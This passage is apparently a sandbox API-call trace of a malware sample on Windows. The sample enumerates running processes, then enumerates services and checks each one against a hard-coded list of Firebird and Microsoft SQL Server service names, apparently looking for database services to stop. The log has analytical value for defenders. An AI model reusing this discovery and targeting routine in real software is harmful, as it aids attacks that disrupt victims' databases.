lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0195.833] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0195.833] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0195.834] lstrlenW (lpString="conhost.exe") returned 11 [0195.834] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0195.835] lstrlenW (lpString="roof competitive.exe") returned 20 [0195.835] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0195.836] lstrlenW (lpString="trustees.exe") returned 12 [0195.836] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0195.837] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0195.837] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0195.838] lstrlenW (lpString="isbn.exe") returned 8 [0195.838] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0195.839] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0195.839] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0195.840] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0195.840] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0195.841] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0195.841] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0195.842] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0195.842] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0195.843] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0195.843] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0195.844] lstrlenW (lpString="playstation iraq.exe") returned 20 [0195.844] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0195.845] lstrlenW (lpString="harbor.exe") returned 10 [0195.845] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0195.846] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0195.846] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0195.847] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0195.847] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0195.848] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0195.848] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0195.849] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0195.849] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0195.850] lstrlenW (lpString="larent.exe") returned 10 [0195.850] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0195.851] lstrlenW (lpString="stereo.exe") returned 10 [0195.851] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0195.852] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0195.852] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0195.853] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0195.853] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0195.855] lstrlenW (lpString="state.exe") returned 9 [0195.855] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0195.856] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0195.856] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.857] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0195.857] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.858] lstrlenW (lpString="taskhostw.exe") returned 13 [0195.859] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.860] lstrlenW (lpString="sppsvc.exe") returned 10 [0195.860] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.931] lstrlenW (lpString="svchost.exe") returned 11 [0195.931] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0195.932] lstrlenW (lpString="Pg.exe") returned 6 [0195.932] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0195.933] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0195.933] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0195.935] lstrlenW (lpString="conhost.exe") returned 11 [0195.935] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0195.936] lstrlenW (lpString="cmd.exe") returned 7 [0195.936] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0195.938] lstrlenW (lpString="conhost.exe") returned 11 [0195.938] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0195.939] CloseHandle (hObject=0x3ac) returned 1 [0195.939] Sleep (dwMilliseconds=0x1f4) [0196.530] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bc60 [0196.530] EnumServicesStatusExW (in: hSCManager=0x236bc60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0196.531] GetLastError () returned 0xea [0196.531] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x236fd58 [0196.531] EnumServicesStatusExW (in: hSCManager=0x236bc60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x236fd58, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x236fd58, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0196.532] CloseServiceHandle (hSCObject=0x236bc60) returned 1 [0196.532] lstrlenW (lpString="Appinfo") returned 7 [0196.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0196.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0196.532] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0196.532] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0196.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0196.532] lstrlenW (lpString="AppXSvc") returned 7 [0196.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0196.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0196.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0196.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0196.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0196.532] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0196.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0196.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0196.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0196.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0196.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0196.532] lstrlenW (lpString="Audiosrv") returned 8 [0196.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0196.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0196.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0196.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0196.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0196.533] lstrlenW (lpString="BFE") returned 3 [0196.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0196.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0196.533] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0196.533] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0196.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0196.533] lstrlenW (lpString="BITS") returned 4 [0196.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0196.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0196.533] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0196.533] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0196.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0196.533] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0196.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0196.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0196.533] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0196.533] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0196.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0196.533] lstrlenW (lpString="CDPSvc") returned 6 [0196.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0196.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0196.533] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0196.534] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0196.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0196.534] lstrlenW (lpString="ClickToRunSvc") returned 13 [0196.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0196.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0196.534] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0196.534] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0196.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0196.534] lstrlenW (lpString="ClipSVC") returned 7 [0196.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0196.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0196.534] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0196.534] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0196.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0196.534] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0196.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0196.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0196.534] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0196.534] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0196.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0196.534] lstrlenW (lpString="CryptSvc") returned 8 [0196.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0196.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0196.534] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0196.534] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0196.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0196.534] lstrlenW (lpString="DcomLaunch") returned 10 [0196.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0196.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0196.535] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0196.535] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0196.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0196.535] lstrlenW (lpString="DeviceAssociationService") returned 24 [0196.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0196.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0196.535] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0196.535] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0196.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0196.535] lstrlenW (lpString="Dhcp") returned 4 [0196.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0196.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0196.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0196.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0196.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0196.535] lstrlenW (lpString="Dnscache") returned 8 [0196.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0196.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0196.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0196.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0196.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0196.535] lstrlenW (lpString="DoSvc") returned 5 [0196.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0196.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0196.535] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0196.535] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0196.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0196.535] lstrlenW (lpString="DPS") returned 3 [0196.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0196.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0196.536] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0196.536] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0196.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0196.536] lstrlenW (lpString="DusmSvc") returned 7 [0196.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0196.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0196.536] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0196.536] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0196.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0196.536] lstrlenW (lpString="EventLog") returned 8 [0196.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0196.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0196.536] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0196.536] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0196.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0196.536] lstrlenW (lpString="EventSystem") returned 11 [0196.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0196.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0196.536] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0196.536] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0196.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0196.536] lstrlenW (lpString="FontCache") returned 9 [0196.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0196.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0196.536] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0196.536] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0196.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0196.537] lstrlenW (lpString="gpsvc") returned 5 [0196.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0196.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0196.537] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0196.537] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0196.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0196.537] lstrlenW (lpString="iphlpsvc") returned 8 [0196.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0196.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0196.537] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0196.537] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0196.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0196.537] lstrlenW (lpString="KeyIso") returned 6 [0196.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0196.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0196.537] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0196.537] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0196.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0196.537] lstrlenW (lpString="LanmanServer") returned 12 [0196.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0196.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0196.537] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0196.537] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0196.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0196.537] lstrlenW (lpString="LanmanWorkstation") returned 17 [0196.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0196.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0196.537] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0196.538] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0196.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0196.538] 